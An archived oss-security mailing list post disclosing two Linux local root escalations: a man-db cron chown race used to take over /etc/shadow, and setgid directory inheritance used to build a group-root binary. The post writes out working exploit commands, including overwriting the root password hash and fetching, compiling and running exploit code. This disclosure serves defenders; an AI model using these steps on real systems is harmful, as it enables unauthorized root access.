oss-sec mailing list archives
Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness
From: halfdog <me () halfdog net>
Date: Sat, 19 Dec 2015 11:23:49 +0000
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Solar Designer wrote:
halfdog -http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/
http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
Thank you for documenting these peculiar findings. While your web pages are nicely formatted and have helpful cross-references, could you please post the actual content to oss-security directly? ...
Sorry, forgot that. I think you mentioned it already in some other post on this list. !!! Just for reference, please ignore !!! The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. This happens e.g. under Ubuntu Vivid with /etc/cron.daily/man-db when systemd is not installed (/run/systemd/system does not exist). The problematic code is # expunge old catman pages which have not been read in a week if [ ! -d /run/systemd/system ] && [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>&1; then echo "Running find" >&2 find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi start-stop-daemon --start --pidfile /dev/null --startas /bin/sh \ --oknodo --chuid man $iosched_idle -- -c \ "find /var/cache/man -type f -name '*.gz' -atime +6 -print0 | \ xargs -r0 rm -f" fi With https://www.halfdog.net/Misc/Utils/DirModifyInotify.c this can be used to change owenership of /etc/shadow and escalate to root. To start, a hardlink to a file of a different user has to be created. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 - --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow Read more at http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ On some Linux systems, directories with setgid bit set may be found, e.g. using find / -type d -perm -02000. On Ubuntu Vivid this includes drwxr-sr-x 25 man root 4096 May 15 00:40 /var/cache/man Creating a file as user man/man with setgid-bit flags will produce a file with setgit bit really set but uid man/root. Normal writes will cause loss of setgid bit, but crafted writing allows to fill the file and hence escalate privileges to group root: man$ cd /var/cache/man man$ wget -q http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c man$ gcc -o CreateSetgidBinary CreateSetgidBinary.c man$ ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg man$ ls -al ./escalate - -rwsrwsr-t 1 man root 155 May 15 02:12 ./escalate man$ ./escalate /bin/sh man$ ls -al /proc/self/ total 0 dr-xr-xr-x 9 man root 0 May 15 02:13 . Read more at http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iEYEARECAAYFAlZ1PjoACgkQxFmThv7tq+6ouQCfZbKWiexcNN/iWNZb7Wc4Lhg1 vXQAn10Rx8RZVDVlSB4haUTQfsMlE3dv =m9be -----END PGP SIGNATURE-----
Attachment:
CreateSetgidBinary.c
Description:
Current thread:
- User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness halfdog (Dec 02)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness halfdog (Dec 13)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness Dag-Erling Smørgrav (Dec 14)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness halfdog (Dec 14)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness Solar Designer (Dec 14)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness halfdog (Dec 20)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness Dag-Erling Smørgrav (Dec 15)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness halfdog (Dec 15)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness cve-assign (Dec 15)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness Dag-Erling Smørgrav (Dec 14)
- Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness halfdog (Dec 13)